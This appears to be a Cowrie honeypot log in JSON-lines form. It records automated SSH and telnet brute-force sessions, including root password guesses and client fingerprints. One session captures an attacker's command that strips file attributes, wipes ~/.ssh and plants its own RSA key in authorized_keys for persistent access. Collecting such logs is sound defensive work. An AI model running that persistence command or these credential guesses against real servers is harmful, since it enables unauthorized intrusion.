{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.603818Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.636612Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.637992Z","src_ip":"212.227.125.160","session":"a3ff8290912a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58652,"dst_ip":"1.2.3.4","dst_port":22,"session":"704f9ee6f5ba","protocol":"ssh","message":"New connection: 212.227.125.160:58652 (1.2.3.4:22) [session: 704f9ee6f5ba]","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.658443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.666824Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.688106Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.login.success","username":"root","password":"bulle","message":"login attempt [root/bulle] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.854516Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:12.929844Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.930682Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.954799Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:12.956040Z","src_ip":"212.227.125.160","session":"704f9ee6f5ba"}
{"eventid":"cowrie.session.connect","src_ip":"114.34.28.19","src_port":37214,"dst_ip":"1.2.3.4","dst_port":23,"session":"37619b09a2ac","protocol":"telnet","message":"New connection: 114.34.28.19:37214 (1.2.3.4:23) [session: 37619b09a2ac]","sensor":"my-vps","timestamp":"2025-08-28T11:46:22.447378Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35264,"dst_ip":"1.2.3.4","dst_port":22,"session":"3db7bdc11e3d","protocol":"ssh","message":"New connection: 212.227.125.160:35264 (1.2.3.4:22) [session: 3db7bdc11e3d]","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.055098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.056152Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.078892Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.login.success","username":"root","password":"brevet","message":"login attempt [root/brevet] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.157025Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:32.677637Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.678369Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.702142Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:32.703530Z","src_ip":"212.227.125.160","session":"3db7bdc11e3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41800,"dst_ip":"1.2.3.4","dst_port":22,"session":"02402bdf34a5","protocol":"ssh","message":"New connection: 212.227.125.160:41800 (1.2.3.4:22) [session: 02402bdf34a5]","sensor":"my-vps","timestamp":"2025-08-28T11:46:35.829275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:35.830738Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:46:35.853236Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.login.success","username":"root","password":"bourbon","message":"login attempt [root/bourbon] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:35.930187Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:35.993816Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:46:35.994604Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:36.040720Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:36.042004Z","src_ip":"212.227.125.160","session":"02402bdf34a5"}
{"eventid":"cowrie.session.closed","duration":13.688478708267212,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:36.135784Z","src_ip":"114.34.28.19","session":"37619b09a2ac"}
{"eventid":"cowrie.session.connect","src_ip":"43.225.158.169","src_port":41267,"dst_ip":"1.2.3.4","dst_port":22,"session":"006a45355f1c","protocol":"ssh","message":"New connection: 43.225.158.169:41267 (1.2.3.4:22) [session: 006a45355f1c]","sensor":"my-vps","timestamp":"2025-08-28T11:46:39.536888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:46:39.546058Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:46:39.802179Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.login.success","username":"root","password":"server@2023","message":"login attempt [root/server@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:40.837313Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:41.380158Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:46:41.380974Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:46:41.381749Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:41.640624Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:46:42.216568Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:46:42.217254Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:46:42.476646Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:42.477745Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.session.connect","src_ip":"43.225.158.169","src_port":41648,"dst_ip":"1.2.3.4","dst_port":22,"session":"79469279fe48","protocol":"ssh","message":"New connection: 43.225.158.169:41648 (1.2.3.4:22) [session: 79469279fe48]","sensor":"my-vps","timestamp":"2025-08-28T11:46:42.729349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:46:42.730322Z","src_ip":"43.225.158.169","session":"79469279fe48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:46:42.987653Z","src_ip":"43.225.158.169","session":"79469279fe48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58840,"dst_ip":"1.2.3.4","dst_port":22,"session":"944474ebb857","protocol":"ssh","message":"New connection: 212.227.125.160:58840 (1.2.3.4:22) [session: 944474ebb857]","sensor":"my-vps","timestamp":"2025-08-28T11:46:43.830357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:43.831363Z","src_ip":"212.227.125.160","session":"944474ebb857"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:46:44.008147Z","src_ip":"212.227.125.160","session":"944474ebb857"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:46:44.053514Z","src_ip":"43.225.158.169","session":"79469279fe48"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:46:44.542999Z","src_ip":"212.227.125.160","session":"944474ebb857"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:45.318380Z","src_ip":"43.225.158.169","session":"79469279fe48"}
{"eventid":"cowrie.session.connect","src_ip":"43.225.158.169","src_port":41969,"dst_ip":"1.2.3.4","dst_port":22,"session":"4418886f42c8","protocol":"ssh","message":"New connection: 43.225.158.169:41969 (1.2.3.4:22) [session: 4418886f42c8]","sensor":"my-vps","timestamp":"2025-08-28T11:46:45.570389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:46:45.578849Z","src_ip":"43.225.158.169","session":"4418886f42c8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:45.726543Z","src_ip":"212.227.125.160","session":"944474ebb857"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:46:45.832920Z","src_ip":"43.225.158.169","session":"4418886f42c8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:46:46.862291Z","src_ip":"43.225.158.169","session":"4418886f42c8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:47.121216Z","src_ip":"43.225.158.169","session":"4418886f42c8"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:46:47.122338Z","src_ip":"43.225.158.169","session":"006a45355f1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47548,"dst_ip":"1.2.3.4","dst_port":22,"session":"60a53c00297c","protocol":"ssh","message":"New connection: 212.227.125.160:47548 (1.2.3.4:22) [session: 60a53c00297c]","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.069262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:46:51.070080Z","src_ip":"212.227.125.160","session":"60a53c00297c"}
